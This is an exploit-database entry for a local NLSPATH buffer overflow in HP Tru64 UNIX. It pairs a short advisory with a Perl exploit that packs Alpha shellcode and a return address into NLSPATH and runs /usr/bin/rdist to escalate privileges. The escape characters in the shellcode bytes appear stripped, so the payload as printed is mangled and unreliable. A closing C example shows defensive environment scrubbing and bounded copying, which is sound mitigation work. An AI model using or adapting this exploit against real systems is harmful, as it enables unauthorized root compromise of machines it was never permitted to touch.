HP Tru64 – NLSPATH Environment Variable Local Buffer Overflow (2)

Vulnerability ID 1053613 Vulnerability type
Published 2002-08-30 Updated 2002-08-30
CVE ID N/A
CNNVD-ID N/A
Platform Unix CVSS score N/A
|Source
https://www.exploit-db.com/exploits/21773
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit
source: http://www.securityfocus.com/bid/5647/info
 
Tru64 is a commercially available UNIX operating system. Tru64 was originally developed by Digital and is now distributed and maintained by HP.
 
A buffer overflow has been discovered in a number of Tru64 binaries. Attackers may exploit this via an overly long value for the NLSPATH environment variable. Because of this flaw, a local attacker may be able to execute arbitrary instructions. As a result, the attacker may be able to execute malicious code and elevate privileges. 

#!/usr/bin/perl -w
#
# based on work by stripey from back in the day
# kf_lists[at]digitalmunition[dot]com
#
# http://www.digitalmunition.com

$sc .= "x30x15xd9x43x11x74xf0x47x12x14x02x42";
$sc .= "xfcxffx32xb2x12x94x09x42xfcxffx32xb2";
$sc .= "xffx47x3fx26x1fx04x31x22xfcxffx30xb2";
$sc .= "xf7xffx1fxd2x10x04xffx47x11x14xe3x43";
$sc .= "x20x35x20x42xffxffxffxffx30x15xd9x43";
$sc .= "x31x15xd8x43x12x04xffx47x40xffx1exb6";
$sc .= "x48xffxfexb7x98xffx7fx26xd0x8cx73x22";
$sc .= "x13x05xf3x47x3cxffx7exb2x69x6ex7fx26";
$sc .= "x2fx62x73x22x38xffx7exb2x13x94xe7x43";
$sc .= "x20x35x60x42xffxffxffxff";

print "Shellcode is " . length($sc) . " bytes long n";

$tlen = (1024-(length($sc)))/4;

$ENV{"NLSPATH"} = "";
system("ulimit -c 10000");
# 0x14001019a Compaq Tru64 UNIX V5.0 (Rev. 910) (TruNastyWhore.localdomain) 
$ret = "x9ax01x01x40x01";
$ENV{"NLSPATH"}= pack("l",0x47ff041f) x ($tlen) . $sc . $ret;
exec("/usr/bin/rdist -c DMr0x");
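
Two mitigations for the over-long NLSPATH problem described above, as an added C example that is not code from the advisory, the exploit author or HP: a launcher drops oversized locale variables from envp before starting a privileged binary, and a bounded copy rejects over-long values. NLS_MAX, the guarded list and all function names are assumptions for illustration, and the sample environment entries are constructed.

```c
#include <stdio.h>
#include <string.h>
#define NLS_MAX 1024  /* assumed limit; the page does not state the real buffer size */

/* Variables read during message-catalog lookup (list chosen for this example). */
static const char *const guarded[] = { "NLSPATH", "LANG", "LC_ALL", "LC_MESSAGES" };

/* Return the value part if entry is "NAME=value" for a guarded NAME, else NULL. */
static const char *guarded_value(const char *entry)
{
    for (size_t i = 0; i < sizeof guarded / sizeof guarded[0]; i++) {
        size_t n = strlen(guarded[i]);
        if (strncmp(entry, guarded[i], n) == 0 && entry[n] == '=')
            return entry + n + 1;
    }
    return NULL;
}

/* Drop guarded variables whose value is NLS_MAX bytes or longer; returns count dropped. */
size_t scrub_env(char **envp)
{
    size_t kept = 0, dropped = 0;
    for (size_t i = 0; envp[i] != NULL; i++) {
        const char *v = guarded_value(envp[i]);
        if (v != NULL && strlen(v) >= NLS_MAX) dropped++;
        else envp[kept++] = envp[i];   /* compact the array in place */
    }
    envp[kept] = NULL;
    return dropped;
}

/* Bounded copy into a fixed buffer: returns -1 rather than overflowing or truncating. */
int copy_bounded(char *dst, size_t dstlen, const char *src)
{
    size_t n = strlen(src);
    if (n >= dstlen) return -1;        /* also covers dstlen == 0 */
    memcpy(dst, src, n + 1);
    return 0;
}

int main(void)
{
    static char big[8 + NLS_MAX + 64] = "NLSPATH=";  /* constructed oversized entry */
    memset(big + 8, 'A', NLS_MAX + 63);
    char ok[] = "NLSPATH=/usr/lib/nls/msg/%L/%N", path[] = "PATH=/usr/bin";
    char *envp[] = { path, big, ok, NULL };
    size_t dropped = scrub_env(envp);
    printf("dropped %zu, envp[1] = %s\n", dropped, envp[1]);
    return 0;
}
```

The scrubbed envp is what a launcher would pass to the privileged program; the bounded copy belongs in the program itself, where the value is stored.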
